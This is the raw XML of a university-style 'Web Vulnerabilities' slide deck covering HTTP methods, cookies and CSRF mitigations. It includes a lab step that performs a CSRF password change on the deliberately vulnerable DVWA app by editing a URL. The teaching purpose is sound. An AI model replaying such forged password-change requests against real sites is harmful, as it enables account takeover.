            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually conducted through social engineering (email/chat)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5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Practice 5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CSRF attack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Set DVWA Security to low level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Select CSRF from the left navigation menu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 password to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc123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Click change and copy the URL string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Keep the webpage open and change the password string in URL to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the password now?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3006606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Synchronizer Token Pattern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Random “challenge” tokens associated with the current session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When sensitive info is requested server verifies associated token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-06-16 at 6.59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191000"/>
            <a:ext cx="58928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 (cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Challenge-Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Re-Authentication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User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logoff immediately after using a security-sensitive web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not allow browser to keep authenticated state for security-sensitive website, i.e., disable cookies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uses different browsers for security sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and non-sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31789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Used to retrieve information from given server using a given URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HEAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identical to GET except that the server replies only headers no entity-body</a:t>
            </a:r>
          </a:p>
          <a:p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Used when you want to send data to server, for example a form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean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1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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2014-06-13 at 12.49.42 PM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54" r="-46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245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GET and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 – Requests data from a specified resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST – Submits data to be processed to a specified resource </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In a GET method query string is sent in the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/test/demo_form.asp?name1=value1&amp;name2=values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In a POST method query strings is sent in the HTTP message body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>POST /test/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>demo_form.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Host: w3schools.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>name1=value1&amp;name2=value2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5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723064"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1600200"/>
          <a:ext cx="8305800" cy="5057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768600"/>
                <a:gridCol w="2768600"/>
              </a:tblGrid>
              <a:tr h="4995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</a:tr>
              <a:tr h="499533">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Reload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Harmless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will be resubmitted</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="499533">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Bookmarked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bookmarked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Cannot be bookmarked</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="499533">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Cached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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> cached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cached</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="4995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Encoding</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> type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Application/x-www-form-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>urlencoded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Multiple</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> forms</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="499533">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>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 remain</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> in browser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saved in history</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="499533"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Restriction</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> on data length/type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Yes/yes (ASCII)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No/no</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="499533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secure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Slightly more</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> secure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="499533">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Visibility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is visible to everyone in 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is not displayed in URL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92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manage state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server has no way of knowing if two requests come from the same browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use Cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The server sends back a token when a page was initially requested </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The browser remembers the token, and sends it along with all subsequent requests to the same URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web servers can then use this information to identify individual users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9179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cookie is small piece of data returned from a website for recording the user’s activity. The next web request from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sends the same cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In-memory cookie, Unique Session Identifier, exists only in temporary memory while user navigates the website </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>racking cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will be purged after an expiration time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422422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is passed in plaintext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The protocol is stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie creates certain problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leaves a single data point for user identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be misused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be confusing, e.g., the browser’s “back” button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6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11065</TotalTime>
  <Words>1209</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>231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宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Web Vulnerabilities</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>HTTP Request Methods</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>Difference between GET and POST</vt:lpstr>
      <vt:lpstr>Comparison</vt:lpstr>
      <vt:lpstr>How to manage state?</vt:lpstr>
      <vt:lpstr>HTTP Cookies</vt:lpstr>
      <vt:lpstr>HTTP Disadvantages</vt:lpstr>
      <vt:lpstr>Database and SQL</vt:lpstr>
      <vt:lpstr>Common Web Vulnerabilities</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Practice 1</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS Classification</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>DOM-based XSS</vt:lpstr>
      <vt:lpstr>Practice 2</vt:lpstr>
      <vt:lpstr>Practice 3</vt:lpstr>
      <vt:lpstr>Practice 4</vt:lpstr>
      <vt:lpstr>Fundamental Problem</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Practice 5</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Mitigation (cont.)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Andu</dc:creator>
  <cp:lastModifiedBy>Xiaolong Wang</cp:lastModifiedBy>
  <cp:revision>301</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-08-10T21:34:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-23T05:01:18Z</dcterms:modified>
</cp:coreProperties>
</file>